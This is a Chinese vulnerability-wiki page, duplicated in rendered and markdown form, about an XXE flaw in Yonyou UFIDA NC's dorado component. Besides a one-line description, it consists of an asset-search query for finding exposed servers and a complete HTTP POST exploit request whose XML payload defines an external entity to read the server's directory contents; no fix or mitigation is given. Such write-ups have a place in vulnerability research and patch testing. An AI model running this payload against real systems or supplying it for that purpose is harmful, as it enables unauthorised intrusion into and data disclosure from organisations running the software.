fofamini-wiki

登录白背景

源码

用友UFIDA NC dorado存在XXE漏洞

一、漏洞简介

用友UFIDA NC dorado存在XXE漏洞。

二、影响版本

用友UFIDA NC

三、资产测绘

hunterapp.name="用友 UFIDA NC"
特征

四、漏洞复现

POST /hrss/dorado/smartweb2.loadfile.d?__rpc=true HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=E3C4A21AC13C42A8C5CF90ACA2431741; datasourceName=nc56; JSESSIONID=9D75FFB655D50BDB1B440BAF4D41531A
Connection: close

__type=updateData&__viewInstanceId=nc.bs.hrss.login.Login~nc.bs.hrss.login.LoginViewModel&__xml=<!DOCTYPE+ANY[<!ENTITY+xxe+SYSTEM+"./">]><rpc+method="noteInputCount"><ps><p+name="user_code">1</p ></ps><vps><p+name="DEFAULT_DATA_SOURCE">%26xxe;</p></vps></rpc>

原文: https://www.yuque.com/xiaokp7/ocvun2/domv1lhu797e8ip2

# 用友UFIDA NC dorado存在XXE漏洞

# 一、漏洞简介
用友UFIDA NC dorado存在XXE漏洞。

# 二、影响版本

- 用友UFIDA NC

# 三、资产测绘

- hunter`app.name="用友 UFIDA NC"`
- 特征

![image.png](./img/Tx5qcvkduK222Uxf/1695490122461-e51a4960-cbf1-4f8b-b3af-1de065806b72-885893.png)

# 四、漏洞复现
```
POST /hrss/dorado/smartweb2.loadfile.d?__rpc=true HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=E3C4A21AC13C42A8C5CF90ACA2431741; datasourceName=nc56; JSESSIONID=9D75FFB655D50BDB1B440BAF4D41531A
Connection: close

__type=updateData&__viewInstanceId=nc.bs.hrss.login.Login~nc.bs.hrss.login.LoginViewModel&__xml=<!DOCTYPE+ANY[<!ENTITY+xxe+SYSTEM+"./">]><rpc+method="noteInputCount"><ps><p+name="user_code">1</p ></ps><vps><p+name="DEFAULT_DATA_SOURCE">%26xxe;</p></vps></rpc>
```
![image.png](./img/Tx5qcvkduK222Uxf/1699616307132-f6f0003c-84c7-4fd8-8414-915915836c81-213181.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/domv1lhu797e8ip2>